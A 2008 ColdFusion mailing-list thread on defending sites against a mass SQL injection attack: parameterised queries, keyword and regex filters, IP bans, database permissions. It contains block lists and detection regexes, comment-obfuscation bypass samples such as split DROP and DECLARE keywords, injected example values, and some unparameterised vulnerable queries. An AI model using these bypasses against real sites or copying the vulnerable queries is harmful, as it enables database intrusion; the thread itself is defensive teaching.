criticism, post some of that fancy regex code that you think would be a better stop gap :) That might help some of the folks who actually need your advice.  If you post such a function it would be much appreciated (I'd certainly like it). -Mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com With this latest spate of SQL attacks it has at least alerted CF (and non CF coders hopefully) to the importance of sql injection and input sanitisation. However I am noticing that almost all of the drop-in 'patches', almost all of them seem to be straight list/array searches and there is almost no use of regular expressions, meaning that these 'solutions' can barely even be considered as suitable stop gaps until more appropriate measures can be taken (cfqueryparam, sql permissions, etcetera) as they really can only stop the most basic attempts and are likely to produce an inordinate number of false positives (someone earlier noted that an admin was blacklisted for using declare in a perfectly acceptable context). It seems to me that such a knee jerk reaction and placing half thought out measures in place almost does more harm than good in that it leaves people with a false sense of security. Take the following code as case in point; function IsSQLInject(input) {   var listSQLInject = "cast,exec,execute,sp_executeSQL,revoke,grant,select,insert,update,delete,dr op,--,'";   var arraySQLInject = ListToArray(listSQLInject);   var i = 1;      for(i=1; i lte arrayLen(arraySQLInject); i=i+1) {     if(findNoCase(arraySQLInject[i], input)) return true;   }      return false; } Running this function over any user input scope will flag every input that contains one of the listed strings, i.e. 'Casting sugar', 'selectable criteria', 'Name: Grant Thompson', so on and so forth... But at least you're secure, right? Dr/*foo*/op table orders; The simplest obfuscation of the command using basic tools and the function is rendered useless. Conclusion? You're stopping legitimate use and still leaving a wide open door to any hacker willing to put in 30 seconds effort. How long until someone rewrites the current attack pattern and uses the above method to bypass all of the shiny new keyword scanners? Dec/*can't see me*/lare @s = .... That's all without even touching upon encoding. I'm not claiming to have the ideal patch, I'm not even claiming to have been the first to notice these things - posts are on many CF blogs detailing these issues in a far more articulate manner, but I think that advocating simple keyword scanners in this list is irresponsible, bad advice can be worse than no advice at all. All 'senior' CF programmers either do, or should know better. Please note that I mean no offence to anyone on this list (or anywhere else for that matter). Regards, Gabriel

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Gabriel
07/24/2008 12:19 AM

Mark, The comment block obfuscation technique has been posted on blog articles that I have read through the years, however http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ seems to be the only one that I can pull up after a 30 second search. Needless to say I am almost certain that I have seen working examples in the past, which has led me to attempt to scan for them. // Seperator chars CS = '.|[^[:alnum:]]'; // Short list of db objects to protect DBObj.short = 'database|function|procedure|role|table|trigger|user|view';      // Build the regex blackList = '@@|' &     'alter(#CS#)*?(#DBObj.short#)|' &     'cast(#CS#)*?\(|' &     'char(#CS#)*?\([[:alnum:]]{2}\)|' & 'create(#CS#)*?(#DBObj.short#)|' &     'declare(#CS#)*?(@|cursor)|' &     'delete(#CS#)*?from(#CS#)*?_|' &     'drop(#CS#)*?(#DBObj.short#)|' &     'exec(#CS#)*?\(|' &     'insert(#CS#)*?values(#CS#)*?\(+?|' &     'sysObjects|' &     'truncate(#CS#)*?table|' &     'update(#CS#)*?set(#CS#)+?|' &     '(s|x)p_[[:alnum:]_]+?|' &     '(\''(#CS#)*?(--)+?)|' &     '((--)+?(#CS#)*?\'')|' &     '/\*(#CS#)*?\*/'; An incomplete, but reasonable regex that allows individual keywords to pass assuming that there are no other characters|keywords which would indicate a possible threat in the parsed string, also includes a scan for block quotes (even if only for my own piece of mind - white space obfuscation and word split). I would do better, however I am not generally granted free licence to spend time posting to discussion lists while I am supposed to be working - else I would have written/posted actual code earlier. What was the point of my original post then? To illustrate that the list/array check is not a good enough solution, even as a stop gap and to get people to perhaps look at doing a little more research on their 'patch' before they go away and dedicate the requisite hours to find and repair all missing queryparams etc, leaving their sites still vulnerable. Sites are still being hit - is it better to wait 12 hours+ to make the point, or get the idea into someone's head now? Just a note: I don't think a single post qualifies as 'peppering', nor do I believe that pointing out legitimate flaws qualifies as pedantic. G

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Brad Wood
07/24/2008 12:34 AM

Thanks for that link Gabriel.  I'm sure it was intended for black hats, but I think stuff like that should be required reading for any web programmer. It's easier to defeat the enemy when you understand what they are doing. ~Brad > Mark, > > The comment block obfuscation technique has been posted on blog articles > that I have read through the years, however > http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ seems to be the

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Mark Kruger
07/24/2008 08:56 AM

Gabriel, Ok... Point taken - you are not peppering the list :) I like the regex below - thank you. That's a useful addition to the discussion. -mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com Mark, The comment block obfuscation technique has been posted on blog articles that I have read through the years, however http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ seems to be the only one that I can pull up after a 30 second search. Needless to say I am almost certain that I have seen working examples in the past, which has led me to attempt to scan for them. // Seperator chars CS = '.|[^[:alnum:]]'; // Short list of db objects to protect DBObj.short = 'database|function|procedure|role|table|trigger|user|view';      // Build the regex blackList = '@@|' &     'alter(#CS#)*?(#DBObj.short#)|' &     'cast(#CS#)*?\(|' &     'char(#CS#)*?\([[:alnum:]]{2}\)|' & 'create(#CS#)*?(#DBObj.short#)|' &     'declare(#CS#)*?(@|cursor)|' &     'delete(#CS#)*?from(#CS#)*?_|' &     'drop(#CS#)*?(#DBObj.short#)|' &     'exec(#CS#)*?\(|' &     'insert(#CS#)*?values(#CS#)*?\(+?|' &     'sysObjects|' &     'truncate(#CS#)*?table|' &     'update(#CS#)*?set(#CS#)+?|' &     '(s|x)p_[[:alnum:]_]+?|' &     '(\''(#CS#)*?(--)+?)|' &     '((--)+?(#CS#)*?\'')|' &     '/\*(#CS#)*?\*/'; An incomplete, but reasonable regex that allows individual keywords to pass assuming that there are no other characters|keywords which would indicate a possible threat in the parsed string, also includes a scan for block quotes (even if only for my own piece of mind - white space obfuscation and word split). I would do better, however I am not generally granted free licence to spend time posting to discussion lists while I am supposed to be working - else I would have written/posted actual code earlier. What was the point of my original post then? To illustrate that the list/array check is not a good enough solution, even as a stop gap and to get people to perhaps look at doing a little more research on their 'patch' before they go away and dedicate the requisite hours to find and repair all missing queryparams etc, leaving their sites still vulnerable. Sites are still being hit - is it better to wait 12 hours+ to make the point, or get the idea into someone's head now? Just a note: I don't think a single post qualifies as 'peppering', nor do I believe that pointing out legitimate flaws qualifies as pedantic. G

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/24/2008 09:16 AM

>>var listSQLInject = "cast,exec,execute,sp_executeSQL,revoke,grant,select,insert,update,delete,dr op,--,'"; Don't forget to include "user" in your list. The first thing hackers try generally is to get to your table of users and passwords. -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Radek Valachovic
07/24/2008 01:15 PM

Do you think when I am using cfqueryparams for example with numbers like this is secured?: SELECT * FROM product WHERE productoid=<cfqueryparam value="#url.productoid#" cfsqltype="CF_SQL_INTEGER" maxlength="6"> Another example I am thinking worse is with text, I made it like this: SELECT * FROM item WHERE L3=<cfqueryparam value="#url.L3#" cfsqltype="CF_SQL_VARCHAR" maxlength="22"> I added maxlength to as more security, with PRODUCTOID it is always 6, and text no more then 22, do you think this should work to secure the site?, not talking about permissions to database etc, just about cfqueryparams. ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Brad Wood
07/24/2008 01:39 PM

Radek, what you did is exactly correct.  (Well, some people might bust your balls for the select *, but that's another performance/bug related discussion) Just make sure you get EVERY vulnerable query in your site. It only takes one bad apple... ~Brad > Do you think when I am using cfqueryparams for example with numbers like > this is secured?:

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Radek Valachovic
07/24/2008 01:52 PM

Yeah I was reading in the forum this one, that using SELECT * is not good, can u explain why on short example? What is Pro and Cons what other type of security it gonna give me? Thanks Radek On Thu, Jul 24, 2008 at 1:39 PM, Brad Wood <brad@bradwood.com> wrote: ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Charlie Griefer
07/24/2008 02:03 PM

On Thu, Jul 24, 2008 at 10:48 AM, Radek Valachovic <rentgeeen@gmail.com> wrote: > Yeah I was reading in the forum this one, that using SELECT * is not good, > can u explain why on short example? What is Pro and Cons what other type of > security it gonna give me? Thanks > Not using SELECT * is more of a "best practices" kind of thing. When you use it, you're potentially pulling more information than you need, which is inefficient.  Additionally, specifying all of the columns you're pulling is more self-documenting. I'd much rather see: SELECT      u.userName      , u.userPhone      , u.userEmail      , u.userAddress FROM      Users u WHERE ... than SELECT * FROM Users with the former, I have a better idea of what i'm dealing with (without the need to <cfdump> the query and see it). -- A byte walks into a bar and orders a pint. Bartender asks him "What's wrong?" Byte says "Parity error." Bartender nods and says "Yeah, I thought you looked a bit off."

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Radek Valachovic
07/24/2008 02:22 PM

What would you suggest for this kind of thing: Select USERID from users where email = '#trim(arguments.email)#' and password = '#trim(arguments.password)#' Something like this? Select USERID from users where email = <cfqueryparam value="#trim(arguments.email)#" cfsqltype="CF_SQL_VARCHAR" maxlength="?"> and password = <cfqueryparam value="#trim(arguments.password)#" cfsqltype="CF_SQL_VARCHAR" maxlength="?"> I put Question marks to MAXLENGHT still thinking if I should specify it for more security (but guessing lenght of emails someone can be rejected) or can it be without MAXLENGHT? Radek ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Adrian Lynch
07/24/2008 02:25 PM

Whatever the length of the column in your DB. Adrian What would you suggest for this kind of thing: Select USERID from users where email = '#trim(arguments.email)#' and password = '#trim(arguments.password)#' Something like this? Select USERID from users where email = <cfqueryparam value="#trim(arguments.email)#" cfsqltype="CF_SQL_VARCHAR" maxlength="?"> and password = <cfqueryparam value="#trim(arguments.password)#" cfsqltype="CF_SQL_VARCHAR" maxlength="?"> I put Question marks to MAXLENGHT still thinking if I should specify it for more security (but guessing lenght of emails someone can be rejected) or can it be without MAXLENGHT? Radek

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Radek Valachovic
07/24/2008 02:59 PM

Okay what about this, for example column name ITEMOID has in DB maxlenght 15 and it is numeric. Integer is -2,147,483,648 and 2,147,483,647 = 10 the point is 10 or 15 doesnt matter. I will specify for ITEMOID in DB maxl = 15 Example QUERY is SELECT location FROM item WHERE url.user_id = #url.user_id# URL gonna look like this example: http://mydomain.com/index.cfm?user_id=125456 Now imagine the Hacker Code (Declare etc etc) will add to the end: http://mydomain.com/index.cfm?user_id=125456;DECLARE........ How can it be processed when  USER_ID in database is specified for LENGHT 15 and USER_ID with Hacker code has lenght like 100? I guess u gonna gonna say that's why u have to use : SELECT location FROM item WHERE url.user_id = <cfqueryparam value="#url.user_id#" cfsqltype="CF_SQL_INTEGER"> to validate it. I undestand that, but why it is not validated already when in DB it is specified lenght 15 and using this query: SELECT location FROM item WHERE url.user_id = #url.user_id# it should work and I have to use another validation in code using cfqueryparam?: SELECT location FROM item WHERE url.user_id = <cfqueryparam value="#url.user_id#" cfsqltype="CF_SQL_INTEGER"> Thanks  RAdek On Thu, Jul 24, 2008 at 2:21 PM, Adrian Lynch <contact@adrianlynch.co.uk> wrote: ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Radek Valachovic
07/24/2008 03:04 PM

Correction sql should be in the text: SELECT location FROM item WHERE user_id = #url.user_id# not SELECT location FROM item WHERE url.user_id = #url.user_id# sorry On Thu, Jul 24, 2008 at 2:55 PM, Radek Valachovic <rentgeeen@gmail.com> wrote: ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Cutter (CFRelated)
07/24/2008 03:09 PM

Radek, The point is, without the cfqueryparam it doesn't really get there. The passed user_id isn't bound in the query, so the ;{everything else} get's processed as additional SQL statements. When the value is bound, then the ;{and everything else} would actually be passed into the field (since it isn't being processed by your SQL server as a statement, just a value), failing the field definition and throwing an error. Steve "Cutter" Blades Adobe Certified Professional Advanced Macromedia ColdFusion MX 7 Developer _____________________________ http://blog.cutterscrossing.com Radek Valachovic wrote: ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Brad Wood
07/24/2008 02:26 PM

Your max length in this scenario should most likely be the size of the database column in question.  If you use a varchar(50) to store your E-mail address, then you know that the only valid strings coming into this query are going to be 50 characters or less. > What would you suggest for this kind of thing: > > Select USERID > from users > where email = '#trim(arguments.email)#' and password = > '#trim(arguments.password)#'

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Ben Forta
07/24/2008 02:26 PM

MAXLENGTH would typically be the maximum the underlying table allows or the maximum you want to accept. And MAXLENGTH is optional. --- Ben What would you suggest for this kind of thing: Select USERID from users where email = '#trim(arguments.email)#' and password = '#trim(arguments.password)#' Something like this? Select USERID from users where email = <cfqueryparam value="#trim(arguments.email)#" cfsqltype="CF_SQL_VARCHAR" maxlength="?"> and password = <cfqueryparam value="#trim(arguments.password)#" cfsqltype="CF_SQL_VARCHAR" maxlength="?"> I put Question marks to MAXLENGHT still thinking if I should specify it for more security (but guessing lenght of emails someone can be rejected) or can it be without MAXLENGHT? Radek > > Not using SELECT * is more of a "best practices" kind of thing. > > When you use it, you're potentially pulling more information than you need, ----- Excess quoted text cut - see Original Post for more ----- the ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Radek Valachovic
07/24/2008 02:30 PM

So if I wont use maxlenght still it is gonna be secured? thanks On Thu, Jul 24, 2008 at 2:23 PM, Ben Forta <ben@forta.com> wrote: ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Brad Wood
07/24/2008 02:34 PM

Absolutely.  Minimally, just using a cfqueryparam tag with the value attributes is enough to let the SQL server know the difference between the SQL statement itself and the parameters being passed into it.  With that distinction, you may get crap data in your database if it is an insert or an update, but arbitrary and malicious code will NEVER get into the cfquery and be executed as SQL. The maxlengh and type are just additional checks which will cause an error to be thrown from ColdFusion when bad data is passed in.  They are a very good idea, but they aren't required. ~Brad > So if I wont use maxlenght still it is gonna be secured? thanks

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Bryan Hogan
07/24/2008 02:36 PM

It will be secured, but it is better IMO to use the maxlength attribute. It should match your schema.  If I were doing this the maxlength on both my cfqueryparam and column would be the maximum length of allowed email addresses.  My standard length for passwords can be no longer than 8 characters.  So my column would have a max length of 8 and my cfqueryparam would have the same value. Remember to not allocate room for more than you are going to use. MAXLENGTH would typically be the maximum the underlying table allows or the maximum you want to accept. And MAXLENGTH is optional. --- Ben What would you suggest for this kind of thing: Select USERID from users where email = '#trim(arguments.email)#' and password = '#trim(arguments.password)#' Something like this? Select USERID from users where email = <cfqueryparam value="#trim(arguments.email)#" cfsqltype="CF_SQL_VARCHAR" maxlength="?"> and password = <cfqueryparam value="#trim(arguments.password)#" cfsqltype="CF_SQL_VARCHAR" maxlength="?"> I put Question marks to MAXLENGHT still thinking if I should specify it for more security (but guessing lenght of emails someone can be rejected) or can it be without MAXLENGHT? Radek > > Not using SELECT * is more of a "best practices" kind of thing. > > When you use it, you're potentially pulling more information than you need, > which is inefficient.  Additionally, specifying all of the columns you're ----- Excess quoted text cut - see Original Post for more ----- (without the > need to <cfdump> the query and see it). > > > -- > A byte walks into a bar and orders a pint. Bartender asks him "What's > wrong?" Byte says "Parity error." Bartender nods and says "Yeah, I thought > you looked a bit off." > > >

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Ian Skinner
07/24/2008 02:31 PM

Charlie Griefer wrote: > Not using SELECT * is more of a "best practices" kind of thing. > > When you use it, you're potentially pulling more information than you need, > which is inefficient.   It can also lead to very hard to debug errors.  When "*" is used, the list of columns can become cached.  If the database changes, this cache does not necessarily get updated.  The code will then break because the list of columns it is trying to get does not match the database any more.  Even if the CFML was not actually using the columns that where added or removed.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Brad Wood
07/24/2008 02:52 PM

What Charlie says is correct.  To elaborate on the performance part.. If you use proper indexes in your database it is possible to have statements that are called "covered selects".   This means that every column in the select clause and where clause are all part of an index, and the records can be retrieved without every hitting the table.  Example: SELECT order_id FROM orders WHERE cust_last_name = 'Wood' Let's supposed I had an index called IX_cust_name on my cust_last_name column (because I searched it often) and I added order_id in as an included column in that index. The execution plan would MOST LIKELY perform an index seek on IX_cust_name (very, very fast) and return the order_id found in stored along side it--   probably on the same page of memory. Your database never had to even hit the table.  If you database is stored on a SAN with a large cache, your oft used index might even be cached in the controller memory. Now, supposed you had taken a shortcut and done the following: SELECT * FROM orders WHERE cust_last_name = 'Wood' Even though you are only using the order_id column (which no one would be able to tell easily) you execution plan now performs an index seek AND performs a bookmark lookup back to the table with the key stored in the index to fetch all the other columns in that row whether they are needed at all. Bookmark lookups can KILL you in large result sets. A lot of this stuff is so negligible you won't notice it with small database, but databases have a way of growing until performance is unbearable.  Also, additional tables added to the select later will cause the amount of data being returned to blossom.  Anyway, I hope that helps put some reasoning to it. ~Brad ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Mark Kruger
07/24/2008 01:40 PM

Using CFQUERYPARAM will secure your DB calls. That doesn't mean you don't have other problems. But it does mean that executing arbitrary code against the DB using user inputs (form, url, cookie) is no longer possible. When the system sees something like "<cfqueryparam type="CF_SQL_CHAR" value="blah; drop table foo"/> it will bind those characters to a variable of the type "char". Unless you are subsequently executing that char string as dynamic SQL somewhere (like in an SP) you are from damage to the DB. Of course there are plenty of other things to worry about :) -Mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com Do you think when I am using cfqueryparams for example with numbers like this is secured?: SELECT * FROM product WHERE productoid=<cfqueryparam value="#url.productoid#" cfsqltype="CF_SQL_INTEGER" maxlength="6"> Another example I am thinking worse is with text, I made it like this: SELECT * FROM item WHERE L3=<cfqueryparam value="#url.L3#" cfsqltype="CF_SQL_VARCHAR" maxlength="22"> I added maxlength to as more security, with PRODUCTOID it is always 6, and text no more then 22, do you think this should work to secure the site?, not talking about permissions to database etc, just about cfqueryparams. > Excuse me... But why are you checking script_name and Path_info for "EXEC(" > .... Both of these are generated on the web server - not sent by the > browser... So I'd be interested to know your reasoning. Also, form > elements are not part of the "query_string" since they are passed in a form "body" ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Mark Kruger
07/24/2008 01:53 PM

Second to last sentence should ready .... "you are safe from damage to the db" Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com Using CFQUERYPARAM will secure your DB calls. That doesn't mean you don't have other problems. But it does mean that executing arbitrary code against the DB using user inputs (form, url, cookie) is no longer possible. When the system sees something like "<cfqueryparam type="CF_SQL_CHAR" value="blah; drop table foo"/> it will bind those characters to a variable of the type "char". Unless you are subsequently executing that char string as dynamic SQL somewhere (like in an SP) you are from damage to the DB. Of course there are plenty of other things to worry about :) -Mark

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Al Musella, DPM
07/23/2008 09:53 PM

That may help with this particular attack, but I already have seen 2 versions of it today..  Both happened to have the "EXEC("   but there are variations that use other key words. The correct way (which unfortunately I found out through failure:) is: 1. Run a scanner like: http://qpscanner.riaforge.org/  and fix EVERY query it finds so that it uses cfqueryparam 2. Do a search for every cfparam in your code and add the correct type.  For example: <cfparam name="id" default="0" type="integer">    That will prevent people from adding anything to the end of the integer.. 3. Set up a sitewide error handler to email you when a problem occurs...  you will be amazed at how many attempts that cfparam catches.. 4. Set up your database so that the user you use with coldfusion is denied permission to all of the system tables and stored procedures that you do not use. 5. I use a filter similar to what you mention below, in the application.cfm or application.cfc file..  mine uses a few other words.. such as   ";DECLARE" , "CHAR( " , ";SET " and  "CAST( " and I am also working on a system of banning the bad IP addresses on the entire server for a while.. figuring if they hit a protected page, why let them keep trying.. I am collecting data on the attack, and it appears that an IP address is only used 2-15 times within a 1 minute period.. then it is never used again.  So it looks like banning the IP for an hour should be ok.. 6. I set up an automated task to check 10 different tables for my own entry every 15 minutes - checking that the email address and website address hasn't changed. If it does, I get notified.. 7. Make sure that you backup your website and database  as frequently as possible.  Keep old versions in case the next attack just changes a few numbers here and there instead of being this obvious. At 08:30 PM 7/23/2008, you wrote: ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Mark Kruger
07/23/2008 10:02 PM

Good list al - but I have a couple of revisions for you :) First, this code: <cfqueryparam name="id" default="0" type="integer"/> Creates a variable in the VARIABLES scope. If you are scoping your variables (as in "#url.id#" then this will have no affect on that scope - or the form scope). If you are not scoping your variables then shame on you :) Second and finally, this attack is a zombie attack using computers throughout the net infected with an adware program of some sort. It is not likely that banning IP addresses will have any significant impact on the number of attacks as their origin will be moving target. -Mark That may help with this particular attack, but I already have seen 2 versions of it today..  Both happened to have the "EXEC("   but there are variations that use other key words. The correct way (which unfortunately I found out through failure:) is: 1. Run a scanner like: http://qpscanner.riaforge.org/  and fix EVERY query it finds so that it uses cfqueryparam 2. Do a search for every cfparam in your code and add the correct type.  For example: <cfparam name="id" default="0" type="integer">    That will prevent people from adding anything to the end of the integer.. 3. Set up a sitewide error handler to email you when a problem occurs... you will be amazed at how many attempts that cfparam catches.. 4. Set up your database so that the user you use with coldfusion is denied permission to all of the system tables and stored procedures that you do not use. 5. I use a filter similar to what you mention below, in the application.cfm or application.cfc file..  mine uses a few other words.. such as   ";DECLARE" , "CHAR( " , ";SET " and  "CAST( " and I am also working on a system of banning the bad IP addresses on the entire server for a while.. figuring if they hit a protected page, why let them keep trying.. I am collecting data on the attack, and it appears that an IP address is only used 2-15 times within a 1 minute period.. then it is never used again.  So it looks like banning the IP for an hour should be ok.. 6. I set up an automated task to check 10 different tables for my own entry every 15 minutes - checking that the email address and website address hasn't changed. If it does, I get notified.. 7. Make sure that you backup your website and database  as frequently as possible.  Keep old versions in case the next attack just changes a few numbers here and there instead of being this obvious. At 08:30 PM 7/23/2008, you wrote: ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Al Musella, DPM
07/23/2008 11:42 PM

  My thinking is:    The way it  appears, a zombie will hit about 2 -12 pages on my web server  - over the course of a few seconds - then leave me alone..     On the first page they hit, if I ban them, then the next 1 to 11 tries will not succeed even if they happen to find a  vulnerable file anywhere on the server. This attack appears to be well coordinated.. I get hit by one IP for a few seconds, then it switches to another IP address for a few seconds and I never see the first one again.. a few overlap so I may see 3 or 4 different IPs at a time, but never more than that so far.. I am still working out the details but it seems to be working:  I use a server variable that holds a list of 20 banned IP addresses.  When a new IP appears, I add it to the end of the list and remove the first one..    seems to be working nicely.   I fixed the problem of banning people with the word Declare in the form submission.. I now look for ";declare" Keywords and banning IPs by themselves are not the answer - I understand that - but along with the changes to the DB permissions, use of sqlqueryparameters and cfparams, they add another layer of defense.. I can't believe this isn't a big news story.. it has been the focus of my life for the last 48 hours:) >Second and finally, this attack is a zombie attack using computers >throughout the net infected with an adware program of some sort. It is not >likely that banning IP addresses will have any significant impact on the >number of attacks as their origin will be moving target.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/24/2008 09:22 AM

>>Keywords and banning IPs by themselves are not the answer Exactly. But t helps to reduce the impact. There is no panacea, only a set of measures. -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Jochem van Dieten
07/24/2008 03:13 PM

Al Musella, DPM wrote: > I can't believe this isn't a big news story.. it has been the focus > of my life for the last 48 hours:) To be a big news story, it would have to be big and new. It is neither. The impact it has had on the net is negligible. Who can mention 3 sites that have been hit that you would have known about if you weren't a ColdFusion developer? The scale and coordination of the attacks are nothing new either. Mail servers have been under this sort of attack permanently for as long as I can remember. Just bring a blackhole mailserver online that appears to be an open relay and see what happens. The techniques used for (and against) this attack are nothing new. This attack has been running against pages with an .asp extension since May. It is just that only recently they switched from just attacking ASP to other extensions as well. And on top of that there is a story since Monday about DNS that is much scarier and much closer to home to most readers. Jochem

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Al Musella, DPM
07/25/2008 06:40 PM

   I won't mention names but  a few popular websites I use have been hit..  one was down for 3 days now. Recently I set up an annonymous ftp server.. I needed a few people to send me files and I thought that would be the easiest way.  the url was private - not published anywhere.. 2 days later my hard drive filled up. But i didn't see any files in the ftp directory.  They created a directory whose name was a blank space so a quick look wouldn't see any extra files there, but there were gigabytes of porn, movies and music in there. The funny thing is you can't delete a blank directory name from windows explorer, or even a command prompt. the trick is to go into a command prompt and do a directory that shows the dos version of the filename and delete that! these people are slick.. we have to start fighting back somehow. ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Andy Matthews
07/24/2008 09:22 AM

What if the hacker puts a space between EXEC and the (? What about if I put: <cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR cgi.QUERY_STRING contains "EXEC("><cfabort></cfif> in my all cf files on my web site and if hacker gonna try to run any of this files for example: index.cfm?+code, mail.cfm?+code etc basically it attacks all on google indexed, but if u put in all of the files, it should abort the connection everytime when one files is executed and tehn any query wont be executed....it should work...what do you think? Radek ----- Excess quoted text cut - see Original Post for more -----

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Dave Watts
07/24/2008 02:00 PM

> Ok, this is another example where CFQP is useful, as the doc says. > But if the query is not likely to be executed often, which is > the case with small sites, generating the execution plan > might represent an overhead on the contrary. > (just assuming, I have not run tests, and I don't really care ;-) If you don't really care, why make the assertion? The database ALWAYS generates an execution plan, whether you use CFQUERYPARAM or not. CFQUERYPARAM simply makes it more likely that the database will be able to reuse an execution plan, as it makes that plan more general that it would otherwise be. > Understand me correctly, I never said that CFQP is NEVER > useful, I just don't like ayatollah statements like SHOULD *always*! Sometimes "always" is the right answer. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/24/2008 02:06 PM

>>If you don't really care I don't really care measuring the difference it makes, because it must certainly be marginal, and it is not because I don't care the difference it can made that I cannot make a comment about it. -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Dave Watts
07/24/2008 02:05 PM

> A very particular situation though. It will not prevent me > from using SELECT * when I need all fields. This is more > efficient than list all of them. It may be more efficient for you as you type them out, but it will be less efficient for your database, which has to figure out what "*" represents by querying its own information schema. It also won't be more efficient for someone following along behind you, because they won't be able to infer the schema from the query. In the first case, the performance difference will admittedly be minor. In the second case, perhaps no one but you will ever edit the code that you write. Nevertheless, it's safe to say that avoiding "*" is a good idea, and for most people it's easier to adhere to a set of best practices rather than evaluating everything they do, every time they do it, to determine what to do right now. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/24/2008 02:16 PM

>>it's safe to say that avoiding "*" is a good idea, Now that's the kind of statement I prefer: "a good idea", better than *always* or *never* :-) -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Ben Forta
07/24/2008 02:18 PM

Fine, it's always a good idea to never use * ;-) --- Ben >>it's safe to say that avoiding "*" is a good idea, Now that's the kind of statement I prefer: "a good idea", better than *always* or *never* :-) -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

